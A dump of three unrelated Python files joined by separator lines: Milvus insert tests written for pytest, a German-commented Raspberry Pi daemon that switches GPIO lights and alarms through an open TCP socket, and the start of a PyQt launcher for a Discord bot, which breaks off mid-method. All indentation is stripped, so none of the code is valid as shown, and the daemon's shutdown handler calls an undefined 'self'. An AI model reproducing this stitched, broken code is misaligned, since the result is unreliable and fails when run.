@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable auto-flush
method: disable auto-flush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=ut.gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
ut.default_top_k, 1, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
logging.getLogger().debug(res)
assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = ut.gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
"""
target: test insert with invalid field
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
field_value = get_field_int_value
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
"""
target: test insert with invalid entity
method: insert with invalid entity value
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
blinkdingsdo.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, time, socket, logging, signal
import RPi.GPIO as GPIO
from threading import Thread
from daemon import Daemon
def blinkdingsdo():
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8888 # Arbitrary non-privileged port
logfile = '/var/log/blinkdingdo.log'
logging.basicConfig(filename=logfile,format='%(asctime)s %(name)s %(levelname)s:%(message)s' ,level=logging.DEBUG)
mylog = logging.getLogger("default")
mylog.info("Beginn Log")
#Function for handling connections. This will be used to create threads
def clientthread(conn, addr):
#Sending message to connected client
conn.send('Wilkommen auf dem Server.\nFuer Hilfe bitte schreiend im Kreis herumrennen oder \'help\' eingeben.\n') #send only takes string
#infinite loop so that function do not terminate and thread do not end.
while True:
#Receiving from client
data = conn.recv(1024).strip()
if data == 'help':
reply = '''\
Blinkdingsdo v0.1
blink_on Schaltet das Blinklicht an.
blink_off Schaltet das Blinklicht aus.
alert Löst einen Cordlessalarm aus.
weather Zeigt den aktuellen Wetterbericht für ihre Region an.
quit Beendet die Verbindung.
'''
elif data == 'blink_on':
# hier sollte das Blinken angeschaltet werden
mylog.info('blink_on von ' + addr[0] + ':' + str(addr[1]))
try:
GPIO.remove_event_detect(12)
GPIO.output(8, GPIO.HIGH)
time.sleep(2)
GPIO.add_event_detect(12, GPIO.FALLING, callback= switchoff2, bouncetime=200)
except Exception as e:
mylog.info(str(e))
reply = 'Blinklicht eingeschaltet\n'
elif data == 'blink_off':
# hier sollte das Blinklicht ausgeschaltet werden
mylog.info('blink_off von ' + addr[0] + ':' + str(addr[1]))
GPIO.output(8, GPIO.LOW)
reply = 'Blinklicht ausgeschaltet\n'
elif data == 'alert':
# hier sollte der Alarm ausgelöst werden
alertthread = Thread(target=alert, args=(1,))
alertthread.start()
reply = 'Alarm ausgelöst\n'
elif data == 'weather':
reply = 'Seriously ????????????????????????\n'
elif data == 'quit':
conn.sendall('ByeBye\n')
break
else:
reply = 'Sie chönts afacht nöd\n'
conn.sendall(reply)
mylog.warning('Disconnected with ' + addr[0] + ':' + str(addr[1]))
conn.close()
def alert(x):
GPIO.output(10, GPIO.HIGH)
mylog.info('alarm ausgeloest')
time.sleep(2)
GPIO.output(10, GPIO.LOW)
def switchoff(x):
while True:
GPIO.wait_for_edge(12, GPIO.FALLING, bouncetime=200)
mylog.info('Switch betaetigt')
GPIO.output(8, GPIO.LOW)
def switchoff2(channel):
mylog.info('Switch betaetigt')
GPIO.output(8, GPIO.LOW)
def handler(signum, frame):
mylog.info('Programm wird beendet')
try:
s.close()
mylog.info('Socket geschlossen')
GPIO.remove_event_detect(12)
GPIO.output(8, GPIO.LOW)
GPIO.output(10, GPIO.LOW)
mylog.info('GPIOs zurueckgesetzt')
except Exception as e:
mylog.info(str(e))
mylog.info("Ende Log")
logging.shutdown()
self.delpid()
sys.exit(0)
mylog.info('Beginn initialisierung')
# RPi.GPIO Layout verwenden (wie Pin-Nummern)
GPIO.setmode(GPIO.BOARD)
# Pins auf Output setzen
GPIO.setup(8, GPIO.OUT)
GPIO.setup(10, GPIO.OUT)
# Pins auf Input setzen und PullUp aktivieren
GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Outputs auf Low setzen
GPIO.output(8, GPIO.LOW)
GPIO.output(10, GPIO.LOW)
mylog.info('Initialisierung abgeschlossen')
#signal.signal(signal.SIGTERM, handler)
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, handler)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mylog.info('Socket created')
#Bind socket to local host and port
try:
s.bind((HOST, PORT))
except socket.error as msg:
mylog.error('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
mylog.info('Socket bind complete')
#Start listening on socket
s.listen(10)
mylog.info('Socket now listening')
#thread01 = Thread(target=switchoff, args=(1,))
#thread01.start()
GPIO.add_event_detect(12, GPIO.FALLING, callback= switchoff2, bouncetime=200)
# Loop
while True:
#wait to accept a connection - blocking call
conn, addr = s.accept()
mylog.info('Connected with ' + addr[0] + ':' + str(addr[1]))
#start new thread takes 1st argument as a function name to be run, second is the tuple of arguments to the function.
x1 = Thread(target=clientthread, args=(conn, addr,))
x1.start()
#########################################################################
# Klasse ueberschreiben
class MyDaemon(Daemon):
def run(self):
blinkdingsdo()
#########################################################################
# Kommandozeilenparameter abfangen
if __name__ == "__main__":
daemon = MyDaemon('/tmp/daemon-example.pid')
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart" % sys.argv[0]
sys.exit(2)
|
QTMain.py | from PyQt5 import QtCore, QtGui, QtWidgets
from main import main
from multiprocessing import Process
import multiprocessing
import os
import qdarkstyle
from PyQt5.QtGui import QIcon
import sys
import nacl
class Ui_MainWindow(object):
def clicked(self):
self.directoryNoExist.hide()
if not self.running:
self.startButton.setText("Stop")
self.startButton.setStyleSheet("background-color: red")
self.process = Process(target=main)
self.process.start()
self.running = True
else:
self.startButton.setText("Start")
self.startButton.setStyleSheet("background-color: green")
self.process.terminate()
self.process.join()
self.running = False
def __init__(self):
self.running = False
def openDirectory(self):
path = os.getenv("LOCALAPPDATA")+"\\DiscordBot"
if os.path.exists(path):
path = os.path.realpath(path)
os.startfile(path)
else:
self.directoryNoExist.show()
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(537, 436)
self.centralwidget = QtWidgets.QWidget(MainWindow)
